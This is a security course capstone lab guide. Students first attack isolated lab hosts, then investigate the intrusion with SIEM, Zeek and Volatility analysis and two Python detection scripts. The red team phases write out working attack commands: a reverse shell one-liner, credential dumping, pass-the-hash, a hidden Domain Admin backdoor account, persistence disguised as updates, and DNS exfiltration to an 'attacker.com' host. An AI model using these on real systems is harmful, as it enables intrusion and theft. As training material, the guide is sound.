seclab/CAPSTONE_APT_Simulation.md
2026-05-28 18:27:41 -06:00


CAPSTONE PROJECT: Operation Serpent's Shadow

Advanced Persistent Threat (APT) Simulation & Incident Response

Duration: 24-30 hours
Points: 200 (Red Team: 100pts, Blue Team: 100pts)
Prerequisites: MOD0-MOD8 completion
Difficulty: Advanced


Executive Summary

Operation Serpent's Shadow is a comprehensive capstone exercise simulating a sophisticated APT campaign against the Apophis Networking infrastructure. You will first act as the Red Team executing a 7-phase attack campaign, then switch roles to become the Blue Team investigating and responding to your own intrusion.

This capstone tests your ability to:

  • Execute complex multi-stage attacks using techniques from MITRE ATT&CK
  • Maintain operational security while achieving attack objectives
  • Detect, analyze, and respond to advanced threats
  • Document findings in professional incident response reports
  • Apply threat intelligence to real-world scenarios

Scenario: A nation-state APT group (codename: SERPENT SYNDICATE) has targeted Apophis Networking to steal intellectual property and maintain persistent access. You will emulate this threat actor, then hunt and remediate the intrusion.


Learning Objectives

By completing this capstone, you will demonstrate:

  1. Red Team Skills:

    • Multi-phase attack chain execution (reconnaissance → persistence)
    • Evasion of security controls (IDS/IPS, EDR simulation)
    • Credential harvesting and lateral movement
    • Data exfiltration techniques
    • OPSEC and TTPs documentation
  2. Blue Team Skills:

    • Security log analysis across multiple sources (SIEM, firewall, endpoint)
    • Intrusion detection and alert triage
    • Digital forensics (disk, memory, network)
    • Incident response lifecycle (NIST PICERL)
    • Threat intelligence correlation (MITRE ATT&CK mapping)
    • Remediation and hardening recommendations
  3. Professional Skills:

    • Technical report writing
    • Timeline reconstruction
    • Executive briefing creation
    • Post-incident review documentation

Lab Environment

Network Topology

VLAN 100 (Management)    : 10.10.1.0/24 - Proxmox, pfSense
VLAN 200 (Red Team)      : 10.10.2.0/24 - Kali Linux
VLAN 300 (Blue Team)     : 10.10.3.0/24 - Security Onion
VLAN 400 (Victim Network): 10.10.4.0/24 - Target Systems

Target Systems (VLAN 400)

  1. DC01 (10.10.4.10) - Windows Server 2022 Domain Controller

    • Domain: apophis.local
    • Services: AD, DNS, LDAP, Kerberos
  2. WS01 (10.10.4.20) - Windows 10 Workstation (HR Department)

    • Domain-joined
    • User: hruser (Domain Users group)
  3. WS02 (10.10.4.21) - Windows 10 Workstation (IT Admin)

    • Domain-joined
    • User: itadmin (Domain Admins group - simulated compromised admin)
  4. WEB01 (10.10.4.30) - DVWA Web Server (Ubuntu + Docker)

    • Services: HTTP (80), SSH (22), MySQL (3306)
  5. FILE01 (10.10.4.40) - Metasploitable 2 (Legacy File Server)

    • Services: FTP (21), SMB (445), SSH (22)

Attack Infrastructure (VLAN 200)

  • Kali Linux (10.10.2.50)
    • Tools: Nmap, Metasploit, Impacket, BloodHound, Responder, Mimikatz

Monitoring Infrastructure (VLAN 300)

  • Security Onion (10.10.3.100)
    • SIEM: Kibana/Elasticsearch
    • IDS/IPS: Suricata
    • Network Forensics: Zeek (Bro), PCAP

PHASE 1: RED TEAM OPERATION (100 Points)

Pre-Engagement Checklist

Before starting the attack campaign:

  1. Create Attack VM Snapshot: Kali_PreAttack_Snapshot
  2. Create Target VM Snapshots: Snapshot all VLAN 400 systems
  3. Verify Network Isolation: Confirm VLAN segmentation and firewall rules
  4. Start Security Onion: Ensure all sensors are running
  5. Create Attack Log Directory:
    mkdir -p ~/capstone/red_team/{logs,screenshots,loot,exfil}
    script ~/capstone/red_team/logs/attack_$(date +%Y%m%d_%H%M%S).log
    

Attack Phase 1: External Reconnaissance (10 Points)

Objective: Map the external attack surface without triggering alerts.

TTPs: MITRE ATT&CK - TA0043 (Reconnaissance)

Tasks:

  1. Passive Reconnaissance:

    # Simulated OSINT gathering (document in report)
    echo "apophis.local" > targets.txt
    echo "10.10.4.0/24" >> targets.txt
    
    # DNS enumeration (if DNS is exposed)
    dig @10.10.4.10 apophis.local ANY
    dig @10.10.4.10 apophis.local AXFR
    
  2. Active Network Scanning:

    # Stealthy host discovery (SYN scan, no ICMP)
    sudo nmap -sS -Pn -T2 --max-retries 1 -oA recon/syn_scan 10.10.4.0/24
    
    # Service enumeration on discovered hosts
    sudo nmap -sV -sC -p- --open -T3 -oA recon/service_scan 10.10.4.0/24
    
  3. SMB/NetBIOS Enumeration:

    # Enumerate SMB shares and users
    enum4linux -a 10.10.4.10 | tee recon/enum4linux_dc01.txt
    smbclient -L //10.10.4.40 -N | tee recon/smbshares_file01.txt
    

Deliverables:

  • Nmap scan results (XML + screenshot)
  • Network topology diagram with discovered hosts/services
  • Target prioritization list (justify choices)

Assessment Criteria (10pts):

  • Comprehensive service enumeration (5pts)
  • Evasion techniques documented (3pts)
  • Target analysis and prioritization (2pts)

Attack Phase 2: Initial Access (15 Points)

Objective: Gain initial foothold on the victim network.

TTPs: MITRE ATT&CK - TA0001 (Initial Access)
Techniques: T1190 (Exploit Public-Facing Application), T1078 (Valid Accounts)

Scenario: You discovered FILE01 (Metasploitable 2) running vulnerable vsftpd 2.3.4.

Tasks:

  1. Exploit vsftpd Backdoor (from MOD3):

    msfconsole -q
    use exploit/unix/ftp/vsftpd_234_backdoor
    set RHOSTS 10.10.4.40
    set PAYLOAD cmd/unix/interact
    exploit
    
  2. Establish Meterpreter Session:

    # Upgrade to full Meterpreter shell
    # (Use MSFVenom payload + upload via FTP if needed)
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.2.50",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    
  3. System Enumeration:

    # Gather system information
    uname -a
    id
    cat /etc/passwd
    cat /etc/shadow 2>/dev/null
    netstat -tulpn
    ls -la /home
    

Deliverables:

  • Screenshot of successful exploit
  • Output of system enumeration commands
  • Screenshot showing whoami and ifconfig from victim

Assessment Criteria (15pts):

  • Successful initial access (10pts)
  • System enumeration completeness (3pts)
  • Shell stability and upgrade (2pts)

Attack Phase 3: Credential Access (15 Points)

Objective: Harvest credentials to enable lateral movement.

TTPs: MITRE ATT&CK - TA0006 (Credential Access)
Techniques: T1003 (OS Credential Dumping), T1110 (Brute Force)

Tasks:

  1. Linux Credential Harvesting (FILE01):

    # Dump /etc/shadow (if accessible)
    cat /etc/shadow
    
    # Search for credentials in config files
    grep -ri password /var/www/html 2>/dev/null
    grep -ri password /home 2>/dev/null
    find / -name "*pass*" -type f 2>/dev/null | head -20
    
  2. Password Cracking:

    # Save hashes and crack with John
    unshadow /tmp/passwd /tmp/shadow > /tmp/unshadowed.txt
    john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/unshadowed.txt
    john --show /tmp/unshadowed.txt
    
  3. Web Application Credential Extraction (WEB01):

    # SQL injection to dump DVWA users (MOD7 techniques)
    sqlmap -u "http://10.10.4.30/vulnerabilities/sqli/?id=1&Submit=Submit#" \
           --cookie="PHPSESSID=<your-session>" \
           --dump -D dvwa -T users
    
  4. Network Credential Sniffing (Advanced):

    # Responder for NTLM hash capture (if AD communication observed)
    sudo responder -I eth0 -wrf
    

Deliverables:

  • Cracked password list (at least 3 accounts)
  • Screenshot of John the Ripper output
  • Captured NTLM hashes (if applicable)
  • SQL injection dump results

Assessment Criteria (15pts):

  • Multiple credential sources exploited (7pts)
  • Successful password cracking (5pts)
  • Documentation of credential storage locations (3pts)

Attack Phase 4: Lateral Movement (20 Points)

Objective: Pivot from initial foothold to domain-joined systems.

TTPs: MITRE ATT&CK - TA0008 (Lateral Movement)
Techniques: T1021.002 (SMB/Windows Admin Shares), T1550.002 (Pass the Hash)

Scenario: You obtained credentials for itadmin and need to access WS02.

Tasks:

  1. SMB Authentication Testing:

    # Test credentials against domain systems
    crackmapexec smb 10.10.4.0/24 -u itadmin -p 'P@ssw0rd123' --shares
    crackmapexec smb 10.10.4.0/24 -u itadmin -p 'P@ssw0rd123' --local-auth
    
  2. PSExec Lateral Movement:

    # Gain shell on WS02 using Impacket
    impacket-psexec 'apophis.local/itadmin:P@ssw0rd123@10.10.4.21'
    
    # Alternative: WMIExec
    impacket-wmiexec 'apophis.local/itadmin:P@ssw0rd123@10.10.4.21'
    
  3. Kerberoasting Attack (MOD5 techniques):

    # Request service tickets for cracking
    impacket-GetUserSPNs 'apophis.local/itadmin:P@ssw0rd123' -dc-ip 10.10.4.10 -request
    
    # Crack TGS tickets
    hashcat -m 13100 tgs_tickets.txt /usr/share/wordlists/rockyou.txt --force
    
  4. BloodHound Enumeration (Advanced):

    # Collect AD data
    bloodhound-python -d apophis.local -u itadmin -p 'P@ssw0rd123' \
                      -ns 10.10.4.10 -c all
    
    # Import into BloodHound GUI and analyze shortest path to Domain Admins
    

Deliverables:

  • Screenshot of successful lateral movement to WS02
  • CrackMapExec output showing access to multiple systems
  • Kerberoast TGS tickets (if obtained)
  • BloodHound attack path graph (screenshot)

Assessment Criteria (20pts):

  • Successful lateral movement to domain system (10pts)
  • Use of multiple techniques (5pts)
  • Active Directory enumeration completeness (5pts)

Attack Phase 5: Privilege Escalation & Persistence (20 Points)

Objective: Escalate to Domain Admin and establish persistent access.

TTPs: MITRE ATT&CK - TA0004 (Privilege Escalation), TA0003 (Persistence)
Techniques: T1068 (Exploitation for Privilege Escalation), T1136 (Create Account), T1547 (Boot/Logon Autostart)

Tasks:

  1. Mimikatz Credential Dumping (WS02):

    # On compromised WS02 system
    mimikatz.exe
    privilege::debug
    sekurlsa::logonpasswords
    lsadump::sam
    lsadump::secrets
    
  2. Pass-the-Hash to Domain Controller:

    # Use captured NTLM hash to access DC01
    impacket-psexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'apophis.local/Administrator@10.10.4.10'
    
  3. Create Backdoor Domain Account:

    # On DC01
    net user backdoor P@ssw0rd123! /add /domain
    net group "Domain Admins" backdoor /add /domain
    net user backdoor
    
  4. Scheduled Task Persistence (WS02):

    # Create scheduled task for Meterpreter callback
    schtasks /create /tn "Windows Update Check" /tr "C:\Windows\Temp\update.exe" ^
             /sc onlogon /ru SYSTEM /f
    
  5. Registry Persistence (Alternative):

    # Add Run key
    reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" ^
        /v SecurityUpdate /t REG_SZ /d "C:\Windows\Temp\update.exe" /f
    

Deliverables:

  • Screenshot of Mimikatz credential dump
  • Proof of Domain Admin access (screenshot of whoami /groups on DC01)
  • Backdoor account creation evidence
  • Persistence mechanism documentation (scheduled task/registry)

Assessment Criteria (20pts):

  • Domain Admin privileges achieved (10pts)
  • Credential dumping success (5pts)
  • Persistence mechanisms installed (3pts)
  • Stealth considerations documented (2pts)

Attack Phase 6: Data Exfiltration (10 Points)

Objective: Locate and exfiltrate sensitive data.

TTPs: MITRE ATT&CK - TA0010 (Exfiltration)
Techniques: T1041 (Exfiltration Over C2 Channel), T1048 (Exfiltration Over Alternative Protocol)

Tasks:

  1. Data Discovery:

    # Search for sensitive files
    Get-ChildItem -Path C:\ -Include *.docx,*.xlsx,*.pdf -Recurse -ErrorAction SilentlyContinue |
        Where-Object { $_.Length -lt 10MB } |
        Select-Object FullName, Length
    
    # Search for "confidential" or "password" in file contents
    findstr /si "password" C:\Users\*.txt C:\Users\*.docx
    
  2. Exfiltration via HTTP:

    # On Kali (setup listener)
    sudo python3 -m http.server 8080
    
    # On victim (download via curl/wget)
    certutil -urlcache -f http://10.10.2.50:8080/file.zip C:\Windows\Temp\file.zip
    
  3. DNS Exfiltration (Stealth technique):

    # Encode data in DNS queries (simulate)
    $data = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("SECRET_DATA"))
    nslookup "$data.attacker.com" 10.10.2.50
    
  4. Simulate Intellectual Property Theft:

    # Create fake sensitive document on DC01
    echo "Apophis Networking - Proprietary Research Data" > C:\Shares\Research\IP_Data.txt
    
    # Compress and exfiltrate
    Compress-Archive -Path C:\Shares\Research\* -DestinationPath C:\Windows\Temp\exfil.zip
    # Transfer using Meterpreter 'download' command
    

Deliverables:

  • List of discovered sensitive files (screenshot)
  • Screenshot of successful exfiltration
  • Network capture showing exfiltration traffic (PCAP)
  • Exfiltrated file samples (in ~/capstone/red_team/exfil/)

Assessment Criteria (10pts):

  • Data discovery methodology (4pts)
  • Successful exfiltration (4pts)
  • Stealth techniques used (2pts)

Attack Phase 7: Red Team Reporting (10 Points)

Objective: Document the attack chain for Blue Team analysis.

Tasks:

  1. Create Attack Timeline:

    • Document each phase with timestamps
    • Include all commands executed
    • Note which actions likely triggered alerts
  2. MITRE ATT&CK Mapping:

    • Map each technique to ATT&CK framework
    • Create coverage matrix (Tactics vs Techniques)
    • Export for dashboard integration
  3. Indicators of Compromise (IOCs):

    • File paths created: C:\Windows\Temp\update.exe
    • Registry keys modified: HKLM\...\Run\SecurityUpdate
    • Network connections: 10.10.2.50:4444 (Meterpreter)
    • User accounts created: backdoor
    • Scheduled tasks: Windows Update Check
  4. Red Team Report Structure:

    # Red Team Report: Operation Serpent's Shadow
    
    ## Executive Summary
    - Attack duration: X hours
    - Systems compromised: 5/5 (100%)
    - Privileges gained: Domain Admin
    - Data exfiltrated: XX MB
    
    ## Attack Chain
    [Phase 1] External Recon → [Phase 2] Initial Access (FILE01) →
    [Phase 3] Credential Harvesting → [Phase 4] Lateral Movement (WS02) →
    [Phase 5] Domain Admin (DC01) + Persistence → [Phase 6] Data Exfiltration
    
    ## Techniques Used
    [MITRE ATT&CK mapping table]
    
    ## Indicators of Compromise
    [IOC list]
    
    ## Detection Gaps Identified
    [Where Blue Team should have caught you]
    

Deliverables:

  • Complete Red Team report (PDF format)
  • MITRE ATT&CK Navigator JSON file
  • IOC list (CSV format)
  • Complete command log from script session

Assessment Criteria (10pts):

  • Report completeness and professionalism (5pts)
  • Accurate MITRE ATT&CK mapping (3pts)
  • Comprehensive IOC documentation (2pts)

PHASE 2: BLUE TEAM OPERATION (100 Points)

Pre-Investigation Checklist

Before starting the Blue Team phase:

  1. Preserve Evidence:

    • Create forensic snapshots of all compromised VMs
    • Copy Security Onion logs: /nsm/sensor_data/
    • Export SIEM data from Kibana (last 24 hours)
  2. Establish Blue Team Workspace:

    mkdir -p ~/capstone/blue_team/{forensics,pcaps,logs,reports,timeline}
    script ~/capstone/blue_team/logs/investigation_$(date +%Y%m%d_%H%M%S).log
    
  3. Review Red Team Report (IOCs only - not methodology yet):

    • Extract IOC list to use as detection baseline
    • Do NOT review attack methodology - simulate real-world blind investigation

Investigation Phase 1: Detection & Triage (15 Points)

Objective: Identify security alerts and determine scope of compromise.

Tasks:

  1. SIEM Alert Review (Security Onion Kibana):

    # High severity alerts in last 24 hours (KQL is a filter language with no "| stats"
    # pipeline; aggregate by rule.name, source.ip and destination.ip in a Lens/Data Table visualization)
    event.severity: high OR event.severity: critical
    
    # Suspicious network connections to VLAN 200
    destination.ip: 10.10.2.* AND event.category: network
    
    # Authentication anomalies (aggregate by user.name and source.ip in a visualization)
    event.category: authentication AND event.outcome: failure
    
  2. Suricata Alert Analysis:

    # Review IDS alerts
    sudo grep -E "ET|MALWARE|EXPLOIT" /var/log/suricata/fast.log
    
    # Extract unique alert signatures (only alert records carry .alert.signature)
    jq -r 'select(.event_type == "alert") | .alert.signature' /var/log/suricata/eve.json | sort -u
    
  3. Zeek Log Analysis:

    # Identify unusual connections
    zeek-cut id.orig_h id.resp_h id.resp_p proto < /nsm/zeek/logs/current/conn.log |
        sort | uniq -c | sort -rn | head -20
    
    # DNS queries to suspicious domains
    zeek-cut query answers < /nsm/zeek/logs/current/dns.log | grep -v ".local"
    
  4. Initial Hypothesis:

    • Document which systems appear compromised
    • Identify likely attack entry point
    • Estimate timeline of initial compromise

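The three checks above (SIEM filters, Suricata signatures, Zeek connection and DNS review) are what an analyst automates first so the same triage can be re-run against a fresh export. The following Python script is an added example, not part of the capstone materials: it parses Suricata eve.json alerts and Zeek conn.log/dns.log by their #fields header, counts alert signatures, lists victim hosts that exchanged traffic with VLAN 200, flags sources whose rejected SYNs hit many ports (the footprint of the Phase 1 SYN scan), and flags DNS queries whose leftmost label looks like encoded data (the Phase 6 DNS exfiltration technique). All sample records are constructed; the signature names are illustrative rather than real rule text.

```python
"""Triage helpers for Security Onion exports: Suricata eve.json, Zeek conn.log and dns.log.
Added example; all sample data below is constructed to resemble sensor output."""
import json
import math
import re
from collections import Counter, defaultdict
from ipaddress import ip_address, ip_network

RED_TEAM_VLAN = ip_network("10.10.2.0/24")          # VLAN 200 from the lab topology
FAILED_STATES = {"S0", "REJ", "RSTO", "RSTOS0"}     # Zeek conn_state values for probes that got no service
B64_LABEL = re.compile(r"^[A-Za-z0-9+/_-]{12,}$")   # long label made only of base64/base64url characters

# --- Constructed Suricata eve.json lines (signature names are illustrative, not real rules) ---
EVE_LINES = [
    '{"timestamp":"2026-02-10T14:23:01","event_type":"alert","src_ip":"10.10.2.50","dest_ip":"10.10.4.40","dest_port":21,"alert":{"signature":"ET SCAN Possible Nmap Service Probe","severity":2}}',
    '{"timestamp":"2026-02-10T14:45:10","event_type":"alert","src_ip":"10.10.2.50","dest_ip":"10.10.4.40","dest_port":21,"alert":{"signature":"ET EXPLOIT vsftpd 2.3.4 Backdoor Command","severity":1}}',
    '{"timestamp":"2026-02-10T14:45:12","event_type":"flow","src_ip":"10.10.4.20","dest_ip":"10.10.4.10","dest_port":445}',
    '{"timestamp":"2026-02-10T14:46:00","event_type":"alert","src_ip":"10.10.4.40","dest_ip":"10.10.2.50","dest_port":4444,"alert":{"signature":"ET MALWARE Possible Metasploit Reverse Shell","severity":1}}',
    '{"timestamp":"2026-02-10T14:46:30","event_type":"alert","src_ip":"10.10.4.40","dest_ip":"10.10.2.50","dest_port":4444,"alert":{"signature":"ET MALWARE Possible Metasploit Reverse Shell","severity":1}}',
]

# --- Constructed Zeek conn.log: 12 rejected probes from Kali (SYN scan), then real sessions ---
CONN_LOG = "\n".join(
    ["#separator \\x09",
     "#fields\tts\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tconn_state"]
    + [f"1770755000.{i}\t10.10.2.50\t{40000 + i}\t10.10.4.40\t{p}\ttcp\tREJ"
       for i, p in enumerate((21, 22, 23, 25, 53, 80, 111, 139, 445, 512, 513, 514))]
    + ["1770756310.0\t10.10.2.50\t51234\t10.10.4.40\t21\ttcp\tSF",     # FTP session to FILE01
       "1770756360.0\t10.10.4.40\t40001\t10.10.2.50\t4444\ttcp\tSF",   # FILE01 calling back to Kali
       "1770756400.0\t10.10.4.20\t49200\t10.10.4.10\t445\ttcp\tSF"]    # WS01 -> DC01 SMB, normal
)

# --- Constructed Zeek dns.log: two labels are base64 of text, as a DNS exfil channel would produce ---
DNS_LOG = "\n".join([
    "#fields\tts\tid.orig_h\tquery",
    "1770756500.0\t10.10.4.21\tdc01.apophis.local",
    "1770756510.0\t10.10.4.21\twww.example.com",
    "1770756520.0\t10.10.4.21\tU0VDUkVUX0RBVEE.attacker.com",
    "1770756521.0\t10.10.4.21\tUHJvcHJpZXRhcnkgUmVzZWFyY2ggRGF0YQ.attacker.com",
])


def parse_eve(lines):
    """Yield only alert records from eve.json (one JSON object per line)."""
    for line in lines:
        if line.strip():
            rec = json.loads(line)
            if rec.get("event_type") == "alert":
                yield rec


def alert_counts(lines):
    """Same result as: jq 'select(.event_type=="alert") | .alert.signature' | sort | uniq -c."""
    return dict(Counter(rec["alert"]["signature"] for rec in parse_eve(lines)))


def parse_zeek(text):
    """Parse a Zeek TSV log using its #fields header; other '#' metadata lines are skipped."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def hosts_talking_to_red_team(conn_text):
    """Victim hosts with any connection to or from VLAN 200, where only Kali should live."""
    victims = set()
    for row in parse_zeek(conn_text):
        orig, resp = ip_address(row["id.orig_h"]), ip_address(row["id.resp_h"])
        if orig in RED_TEAM_VLAN and resp not in RED_TEAM_VLAN:
            victims.add(str(resp))
        elif resp in RED_TEAM_VLAN and orig not in RED_TEAM_VLAN:
            victims.add(str(orig))
    return sorted(victims)


def scan_sources(conn_text, min_ports=10):
    """Sources whose rejected/unanswered SYNs touched many distinct ports: a port-scan footprint."""
    ports = defaultdict(set)
    for row in parse_zeek(conn_text):
        if row["conn_state"] in FAILED_STATES:
            ports[row["id.orig_h"]].add(row["id.resp_p"])
    return {src: len(p) for src, p in ports.items() if len(p) >= min_ports}


def shannon_entropy(s):
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def looks_encoded(label):
    """Long base64-charset label with mixed character classes and non-trivial entropy."""
    if not B64_LABEL.match(label):
        return False
    classes = sum(bool(re.search(p, label)) for p in (r"[A-Z]", r"[a-z]", r"[0-9]"))
    return classes >= 2 and shannon_entropy(label) >= 2.5


def suspicious_dns(dns_text, internal_suffixes=(".local",)):
    """DNS queries whose leftmost label looks like encoded data (candidate DNS tunneling)."""
    hits = []
    for row in parse_zeek(dns_text):
        query = row["query"]
        if not query.endswith(internal_suffixes) and looks_encoded(query.split(".")[0]):
            hits.append((row["id.orig_h"], query))
    return hits


if __name__ == "__main__":
    for sig, n in sorted(alert_counts(EVE_LINES).items(), key=lambda kv: -kv[1]):
        print(f"{n:4d}  {sig}")
    print("hosts in contact with VLAN 200:", hosts_talking_to_red_team(CONN_LOG))
    print("probable scanners (distinct ports probed):", scan_sources(CONN_LOG))
    for src, query in suspicious_dns(DNS_LOG):
        print(f"encoded-looking DNS query from {src}: {query}")
```

Point the three loaders at real exports (`open("eve.json")`, the contents of conn.log and dns.log) and the functions work unchanged; the entropy and label-length thresholds are starting points to tune against the lab's baseline traffic, since long legitimate hostnames can also trip them.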
Deliverables:

  • Top 10 critical alerts (screenshot)
  • Network connection matrix (source → dest mapping)
  • Initial incident triage report (1-2 pages)

Assessment Criteria (15pts):

  • Alert prioritization and triage (7pts)
  • Correct identification of compromised systems (5pts)
  • Timeline accuracy (3pts)

Investigation Phase 2: Network Forensics (15 Points)

Objective: Analyze network traffic to reconstruct attack activities.

Tasks:

  1. PCAP Analysis (Wireshark):

    # Export suspicious traffic from Security Onion
    # (tcpdump -r reads a single file, so filter each daily PCAP and merge the results)
    mkdir -p ~/capstone/blue_team/pcaps/parts
    for f in /nsm/sensor_data/securityonion-eth1/dailylogs/*.pcap; do
        sudo tcpdump -r "$f" 'host 10.10.2.50 or host 10.10.4.40' \
                     -w ~/capstone/blue_team/pcaps/parts/"$(basename "$f")"
    done
    mergecap -w ~/capstone/blue_team/pcaps/attack_traffic.pcap ~/capstone/blue_team/pcaps/parts/*.pcap
    
  2. Identify C2 Communication:

    • Filter for connections to Kali (10.10.2.50)
    • Look for Meterpreter beacons (TCP 4444, HTTP reverse shells)
    • Identify exfiltration channels
  3. Extract Artifacts from PCAP:

    # Export HTTP objects (potential exfil data)
    tshark -r attack_traffic.pcap --export-objects http,/tmp/http_objects/
    
    # SMB file transfers
    tshark -r attack_traffic.pcap -Y "smb2.cmd == 0x0009" -T fields \
           -e frame.time -e ip.src -e ip.dst -e smb2.filename
    
  4. Protocol Analysis:

    • Document SMB sessions (lateral movement)
    • Kerberos TGT/TGS requests (Kerberoasting)
    • DNS queries (potential DNS tunneling)
    • HTTP POST requests (data exfiltration)

Deliverables:

  • Annotated PCAP with attack traffic highlighted
  • Screenshot of C2 communication in Wireshark
  • Extracted artifacts (HTTP objects, SMB files)
  • Network forensics report (protocol breakdown)

Assessment Criteria (15pts):

  • Correct identification of attack traffic (7pts)
  • C2 channel analysis (5pts)
  • Artifact extraction completeness (3pts)

Investigation Phase 3: Host Forensics (20 Points)

Objective: Perform disk and memory forensics on compromised systems.

Tasks:

  1. Disk Forensics with Autopsy (FILE01 - Initial Access Point):

    # Create disk image (acquire from the hypervisor or a forensic boot medium, not from
    # the running compromised OS, and hash the image for the evidence inventory)
    sudo dd if=/dev/sda of=~/capstone/blue_team/forensics/file01.dd bs=4M status=progress
    
    # Import into Autopsy and analyze:
    # - Timeline of file modifications
    # - Deleted files recovery
    # - Web history / bash history
    # - Malware artifacts
    
  2. Memory Forensics with Volatility (WS02 - Lateral Movement Target):

    # Capture memory dump (from Proxmox or use FTK Imager)
    # Analyze with Volatility 3
    
    python3 vol.py -f ws02_memory.raw windows.info
    python3 vol.py -f ws02_memory.raw windows.pslist
    python3 vol.py -f ws02_memory.raw windows.netscan
    python3 vol.py -f ws02_memory.raw windows.malfind
    python3 vol.py -f ws02_memory.raw windows.dumpfiles --pid <suspicious_pid>
    
  3. Windows Event Log Analysis (DC01):

    # Security event logs (authentication)
    Get-WinEvent -LogName Security -FilterXPath "*[System[EventID=4624 or EventID=4625 or EventID=4672]]" |
        Where-Object { $_.TimeCreated -gt (Get-Date).AddHours(-24) } |
        Select-Object TimeCreated, Id, Message
    
    # Logon events (type 3 = network, type 10 = remote interactive)
    Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} |
        Where-Object { $_.Properties[8].Value -eq 3 -or $_.Properties[8].Value -eq 10 }
    
    # Account creation events
    Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4720}
    
  4. Registry Forensics (Persistence Mechanisms):

    # Check Run keys
    Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
    
    # Scheduled tasks
    Get-ScheduledTask | Where-Object { $_.Principal.UserId -eq "SYSTEM" } |
        Select-Object TaskName, TaskPath, Date
    
    # Services
    Get-Service | Where-Object { $_.StartType -eq "Automatic" -and $_.Status -eq "Running" }
    
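The event log queries above pull raw 4624/4625/4672/4720 records; the analysis value comes from correlating them. The script below is an added example, not part of the capstone or any module, that runs three correlations over constructed Security event records shaped like the fields a 4624 exposes (TargetUserName at Properties[5], LogonType at Properties[8], IpAddress at Properties[18]): network or RDP logons of privileged accounts from hosts that are not admin workstations (Phase 4 lateral movement and Phase 5 pass-the-hash), bursts of 4625 failures (the Phase 3 credential attempts), and an account created (4720) and added to an Admins group (4728) within a short window (the Phase 5 backdoor account). The admin-workstation set and the time windows are assumptions for this lab.

```python
"""Correlations over Windows Security events exported from DC01.
Added example; EVENTS is constructed, with field names chosen for this script."""
from collections import defaultdict
from datetime import datetime, timedelta

PRIVILEGED = {"itadmin", "Administrator"}
ADMIN_WORKSTATIONS = {"10.10.4.21"}   # assumption: WS02 is the only host itadmin should log on from
NETWORK_LOGON_TYPES = {3, 10}         # 3 = network (SMB/psexec/wmiexec), 10 = RemoteInteractive (RDP)

# Constructed records: ts, EventID, acting user, source IP and logon type as a 4624 carries them
EVENTS = [
    {"ts": "2026-02-10T15:10:00", "id": 4625, "user": "itadmin", "src_ip": "10.10.2.50", "logon_type": 3},
    {"ts": "2026-02-10T15:10:20", "id": 4625, "user": "itadmin", "src_ip": "10.10.2.50", "logon_type": 3},
    {"ts": "2026-02-10T15:10:40", "id": 4625, "user": "itadmin", "src_ip": "10.10.2.50", "logon_type": 3},
    {"ts": "2026-02-10T15:12:00", "id": 4624, "user": "itadmin", "src_ip": "10.10.2.50", "logon_type": 3},
    {"ts": "2026-02-10T15:12:00", "id": 4672, "user": "itadmin", "src_ip": "10.10.2.50"},
    {"ts": "2026-02-10T15:30:00", "id": 4624, "user": "hruser", "src_ip": "10.10.4.20", "logon_type": 2},
    {"ts": "2026-02-10T15:50:00", "id": 4624, "user": "Administrator", "src_ip": "10.10.2.50", "logon_type": 3},
    {"ts": "2026-02-10T16:02:00", "id": 4720, "user": "Administrator", "target": "backdoor"},
    {"ts": "2026-02-10T16:02:30", "id": 4728, "user": "Administrator", "target": "backdoor", "group": "Domain Admins"},
    {"ts": "2026-02-10T16:05:00", "id": 4624, "user": "itadmin", "src_ip": "10.10.4.21", "logon_type": 10},
]


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def privileged_remote_logons(events):
    """4624 network/RDP logons of privileged accounts from hosts outside the admin workstation set."""
    return [
        (e["ts"], e["user"], e["src_ip"], e["logon_type"])
        for e in sorted(events, key=_ts)
        if e["id"] == 4624 and e["user"] in PRIVILEGED
        and e["logon_type"] in NETWORK_LOGON_TYPES and e["src_ip"] not in ADMIN_WORKSTATIONS
    ]


def failed_logon_bursts(events, threshold=3, window=timedelta(minutes=5)):
    """Users with at least `threshold` 4625 failures inside any sliding window (password guessing)."""
    by_user = defaultdict(list)
    for e in events:
        if e["id"] == 4625:
            by_user[e["user"]].append(_ts(e))
    bursts = {}
    for user, times in by_user.items():
        times.sort()
        best = max(sum(1 for t in times[i:] if t - start <= window) for i, start in enumerate(times))
        if best >= threshold:
            bursts[user] = best
    return bursts


def rogue_admin_accounts(events, window=timedelta(minutes=30)):
    """Accounts created (4720) and added to an Admins group (4728) within `window`."""
    created = {e["target"]: _ts(e) for e in events if e["id"] == 4720}
    findings = []
    for e in sorted(events, key=_ts):
        if e["id"] == 4728 and "Admins" in e["group"] and e["target"] in created:
            delta = _ts(e) - created[e["target"]]
            if timedelta(0) <= delta <= window:
                findings.append((e["target"], e["group"], int(delta.total_seconds())))
    return findings


if __name__ == "__main__":
    print("privileged remote logons:", privileged_remote_logons(EVENTS))
    print("failed logon bursts:", failed_logon_bursts(EVENTS))
    print("rogue admin accounts:", rogue_admin_accounts(EVENTS))
```

Each finding carries its timestamp, so the three lists drop straight into the incident timeline table required for the final report; on a live DC, build the EVENTS list from Get-WinEvent output (or an evtx-to-JSON export) using the Properties indices named in the lead-in.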

Deliverables:

  • Autopsy case report with timeline
  • Volatility analysis results (processes, network connections)
  • Windows Event Log summary (authentication anomalies)
  • Registry forensics findings (persistence mechanisms)

Assessment Criteria (20pts):

  • Disk forensics completeness (7pts)
  • Memory forensics quality (7pts)
  • Event log analysis (4pts)
  • Persistence mechanism identification (2pts)

Investigation Phase 4: Incident Response (NIST PICERL) (20 Points)

